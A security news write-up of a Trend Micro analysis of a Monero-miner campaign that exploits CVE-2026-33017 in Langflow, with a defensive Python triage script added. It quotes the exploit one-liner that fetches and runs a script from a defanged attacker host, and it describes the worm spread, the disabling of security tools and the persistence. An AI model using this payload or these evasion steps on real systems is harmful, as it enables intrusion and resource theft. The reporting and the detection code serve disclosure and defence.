CVE-2026-33017: Exploitation Details Reveal Monero Miner Campaign Targeting Exposed Langflow AI Instances
Trend Micro researchers detail a cryptomining campaign exploiting CVE-2026-33017, an unauthenticated RCE vulnerability in the Langflow AI workflow tool, exposing the pivot from targeting traditional infrastructure to AI application endpoints.

A new campaign is actively exploiting CVE-2026-33017, a critical vulnerability in the open-source Langflow AI workflow tool, to deploy a Monero cryptocurrency miner on exposed instances. Researchers at Trend Micro have published a full technical analysis of the attack chain, revealing how a single unauthenticated POST request can lead to the complete compromise of a system running AI application infrastructure. The campaign underscores a growing trend: commodity cryptominer operators are pivoting from traditional targets like Docker APIs and SSH to AI pipeline tools that are often deployed with default credentials or missing authentication.
The initial access vector is an unauthenticated POST to Langflow's /api/v1/build_public_tmp/{flow_id}/flow endpoint. By default, Langflow ships with AUTO_LOGIN enabled, granting any unauthenticated visitor a superuser token and the ability to create a public flow on demand. Attackers exploit this by sending a JSON payload containing a single line of Python code: __import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh'). This one-liner fetches and executes a shell script from a remote server, effectively granting full remote code execution on the Langflow instance.
The dropper, a bash script named isp.sh, checks if a binary called lambsys is already running. If not, it creates a hidden persistence directory at /var/tmp/.xlamb/, downloads the lambsys binary via curl or wget, and launches it. The script then spreads to every SSH-reachable host by enumerating key files and agent sockets, demonstrating a worm-like propagation mechanism. The lambsys binary is an ELF executable written in Go and UPX-packed. Before engaging in mining operations, it runs a strict setup sequence designed to eliminate competition and disable security controls.
lambsys first raises the ulimit to sustain enough sockets for mining pool connections. It then runs pkill commands against a list of rival cryptominers, mining pools, and process-hiding techniques. It kills processes on 13 common mining ports and terminates anything referenced by hidden PID files under /tmp/.X11-unix/ and /tmp/.systemd.*. The binary also deletes the akay and vfinder accounts and backdoor logins from earlier Linux miner campaigns, and it disables AppArmor, UFW, iptables, SELinux, the kernel NMI watchdog, and the Alibaba Cloud Aliyun agent. It strips chattr +i locks on cron, /tmp, and SSH infrastructure, and deletes /var/log/syslog to cover its tracks.
To maintain persistence, lambsys plants two watchdogs: a cron job that runs every five minutes, and a bash loop (init_rmount) that runs every 60 seconds. Both are capable of re-pulling the binary from the command-and-control (C&C) server and then locking /tmp and /var/tmp with chattr +iua to prevent tampering. The beacon mechanism involves a JSON heartbeat POSTed to 83[.]142[.]209[.]214:80/status.php every ~128 seconds. Separately, lambsys pulls a file named ks.tar, verifies it with MD5, and extracts a customized XMRig miner (procq) into a hidden triple-dot-space directory. The miner connects to a mining pool on TCP/3333.
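One way to triage a Linux host for the artifacts described above, added here as an example (it is not Trend Micro's tooling or code from the original report). The function and parameter names, and the reading of "triple-dot-space" as a directory name made only of dots and spaces, are assumptions; the sample tree in demo() is constructed.

```python
import os
import re
import tempfile

# Indicator names come from the article; the C&C address is defanged there, refanged here.
PROC_NAMES = {"lambsys", "procq"}
PERSIST_DIR = "var/tmp/.xlamb"
C2 = "83[.]142[.]209[.]214".replace("[.]", ".")
CRON_MARKERS = ("lambsys", ".xlamb", "init_rmount", C2)
# Assumption: "triple-dot-space" is a directory whose name is only dots and spaces.
DOT_SPACE = re.compile(r"[. ]+")


def triage(root, running, cron_text, scan_dirs=("tmp", "var/tmp")):
    """Return (indicator, detail) findings for a live or mounted filesystem.

    root      -- filesystem root to inspect ("/" live, or a forensic mount point)
    running   -- process command lines, one string each
    cron_text -- concatenated crontab contents
    """
    findings = []
    names = {os.path.basename(p.split()[0]) for p in running if p.split()}
    for name in sorted(PROC_NAMES & names):
        findings.append(("process", name))
    if any("init_rmount" in p for p in running):
        findings.append(("watchdog-loop", "init_rmount"))
    if os.path.isdir(os.path.join(root, PERSIST_DIR)):
        findings.append(("persistence-dir", "/" + PERSIST_DIR))
    for line in cron_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#") and any(m in entry for m in CRON_MARKERS):
            findings.append(("cron", entry))
    for base in scan_dirs:
        for dirpath, dirnames, _ in os.walk(os.path.join(root, base)):
            for d in dirnames:
                if DOT_SPACE.fullmatch(d):
                    rel = os.path.relpath(os.path.join(dirpath, d), root)
                    findings.append(("dot-space-dir", "/" + rel))
    return findings


def demo():
    """Run triage over a constructed temp tree that mimics an affected host."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "var/tmp/.xlamb"))
        os.makedirs(os.path.join(root, "tmp/... "))
        cron = "# constructed\n*/5 * * * * /var/tmp/.xlamb/lambsys\n0 3 * * * /usr/bin/backup\n"
        procs = ["sshd", "/var/tmp/.xlamb/lambsys", "bash init_rmount"]
        return triage(root, procs, cron)
```

On a live host, pass root="/" with the output of `ps -eo args=` and the contents of the system and user crontabs.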
This is the second time in a year that Langflow has shipped this class of vulnerability. The first, CVE-2025-3248, was exploited in June 2025 by the Flodrix DDoS botnet operators using essentially the same primitive. The current campaign shifts the payload from Flodrix to a cryptocurrency miner, but the exploit surface remains identical. Trend Micro's analysis covers 19 days of observed exploitation activity, emphasizing that the delivery vector is the only thing that has moved. The payloads behind the door have existed, in some cases with the same filename and install path, since at least May 2024.
The attack highlights a broader pattern: as organizations rapidly deploy AI application infrastructure, security configurations often lag behind. Langflow is not the first AI application framework to become a commodity-miner delivery vector, and researchers note it will not be the last. Organizations running Langflow instances are urged to ensure instances are not exposed to the public internet, enable authentication, and apply the patch released on March 13, 2026. The CVE-2026-33017 vulnerability serves as a stark reminder that AI pipelines, once considered internal tools, are now front-line targets in the evolving threat landscape.